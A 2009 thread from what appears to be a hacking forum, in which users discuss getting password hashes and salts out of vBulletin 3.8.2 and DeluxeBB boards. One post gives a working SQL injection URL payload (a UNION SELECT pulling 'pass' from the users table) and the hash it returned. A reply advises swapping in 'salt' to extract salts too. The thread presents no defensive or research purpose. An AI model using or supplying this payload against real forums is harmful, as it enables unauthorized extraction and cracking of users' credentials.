|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Vbulletin 3.8.2 Salt |
|
Posted: Tue Aug 04, 2009 8:48 pm |
|
|
halox |
Beginner |
|
|
Joined: Aug 04, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
Im able to get the Hash for VB 3.8.2....
Anyone know how to grab the salt? Not a nulled version...
Thanks...
J |
|
|
|
|
Posted: Wed Aug 05, 2009 12:08 am |
|
|
dune |
Active user |
|
|
Joined: Jul 05, 2009 |
Posts: 26 |
|
|
|
|
|
|
|
how are you getting the hash? teach me please? |
|
|
|
|
Posted: Wed Aug 05, 2009 5:57 am |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
In whatever exploit you are using, change the parameter 'password' within the SQL injection to 'salt'. It should be 3-4 characters (4 or more only if it has salt with the characters ' or " or / or \ in it. |
|
|
|
|
Posted: Wed Aug 05, 2009 2:36 pm |
|
|
halox |
Beginner |
|
|
Joined: Aug 04, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
Thanks for the reply.
Im using:
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
It Returns:
8vQFDYbmIVjJhXW1RchgYcGi7FKiXBPyCEPLHkNo/k0=
My hash:
8vQFDYbmIVjJhXW1RchgYcGi7FKiXBPy
When I change pass to salt in SQL statement, I get same reslts. I was expecting a 3-digit salt. The returned data is identical to when pass is used.
Any ideas? Thanks again...
J |
|
|
|
|
|
|
|
|
Posted: Wed Aug 05, 2009 7:37 pm |
|
|
dune |
Active user |
|
|
Joined: Jul 05, 2009 |
Posts: 26 |
|
|
|
|
|
|
|
halox wrote: | Thanks for the reply.
Im using:
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
It Returns:
8vQFDYbmIVjJhXW1RchgYcGi7FKiXBPyCEPLHkNo/k0=
My hash:
8vQFDYbmIVjJhXW1RchgYcGi7FKiXBPy
When I change pass to salt in SQL statement, I get same reslts. I was expecting a 3-digit salt. The returned data is identical to when pass is used.
Any ideas? Thanks again...
J |
I don't understand, so you put the entire code in the address bar? Can you give me an example please? |
|
|
|
|
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|